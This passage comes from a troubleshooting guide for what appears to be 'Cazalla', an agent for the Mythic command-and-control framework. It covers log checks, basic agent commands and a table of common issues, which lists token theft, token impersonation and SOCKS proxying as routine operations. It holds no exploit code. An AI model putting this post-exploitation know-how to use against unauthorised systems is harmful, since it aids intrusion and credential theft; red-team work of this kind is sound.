sudo docker logs cazalla_translator | grep -i context
|
||||
```
|
||||
|
||||
3. **Verify Context Format**
|
||||
- Check context data is in correct format
|
||||
- Verify `0xF0` marker is used
|
||||
|
||||
---
|
||||
|
||||
## General Debugging
|
||||
|
||||
### Enable Debug Logging
|
||||
|
||||
**Agent Side:**
|
||||
- Define `DEBUG_SOCKS`, `DEBUG_SLEEP`, etc. during compilation
|
||||
- Rebuild agent with debug flags
|
||||
|
||||
**Translator Side:**
|
||||
- Check translator logs: `sudo docker logs cazalla_translator`
|
||||
- Look for error messages and warnings
|
||||
|
||||
### Check Agent Status
|
||||
|
||||
```bash
|
||||
# Check current context
|
||||
whoami
|
||||
pwd
|
||||
|
||||
# Check agent is responding
|
||||
ps
|
||||
ls
|
||||
|
||||
# Check last check-in
|
||||
# (Visible in Mythic UI callback details)
|
||||
```
|
||||
|
||||
### Review Logs
|
||||
|
||||
**Mythic Server Logs:**
|
||||
```bash
|
||||
sudo docker logs mythic_server
|
||||
```
|
||||
|
||||
**Translator Logs:**
|
||||
```bash
|
||||
sudo docker logs cazalla_translator
|
||||
```
|
||||
|
||||
**Agent Logs:**
|
||||
- If running interactively, check console output
|
||||
- Check Windows Event Logs for errors
|
||||
|
||||
### Common Issues Summary
|
||||
|
||||
| Issue | Symptom | Solution |
|
||||
|-------|---------|---------|
|
||||
| **Agent Not Connecting** | No callback in UI | Check network, C2 profile, port |
|
||||
| **Commands Not Executing** | Task stuck in Processing | Check agent status, command syntax |
|
||||
| **File Not Found** | Error Code 2 | Use absolute paths, check current directory |
|
||||
| **Access Denied** | Error Code 5 | Check permissions, use token impersonation |
|
||||
| **Process Browser Empty** | No processes shown | Execute `ps` command, rebuild translator |
|
||||
| **SOCKS Not Working** | Connection timeout | Check port binding, agent status |
|
||||
| **Token Theft Fails** | Access denied | Use SYSTEM privileges, check process access |
|
||||
| **Build Fails** | Compilation errors | Check Docker, build parameters |
|
||||
|
||||
---
|
||||
|
||||
## Getting Help
|
||||
|
||||
If you're still experiencing issues:
|
||||
|
||||
1. **Check Documentation**
|
||||
- [Commands Reference](commands.md)
|
||||
- [Features Overview](features.md)
|
||||
- [Getting Started](getting-started.md)
|
||||
|
||||
2. **Review Logs**
|
||||
- Mythic server logs
|
||||
- Translator logs
|
||||
- Agent logs (if available)
|
||||
|
||||
3. **Verify Configuration**
|
||||
- C2 profile settings
|
||||
- Build parameters
|
||||
- Network connectivity
|
||||
|
||||
4. **Check Known Issues**
|
||||
- Review GitHub issues (if available)
|
||||
- Check Mythic documentation
|
||||
|
||||
---
|
||||
|
||||
## Related Documentation
|
||||
|
||||
- [Commands Reference](commands.md) - Detailed command documentation
|
||||
- [Getting Started](getting-started.md) - Installation and setup
|
||||
- [Features Overview](features.md) - Feature explanations
|
||||
- [OPSEC Guide](opsec.md) - Security considerations
|
||||
|
||||
---
|
||||
|
||||
**Last Updated:** 2024
|
||||
|
||||
Reference in New Issue
Block a user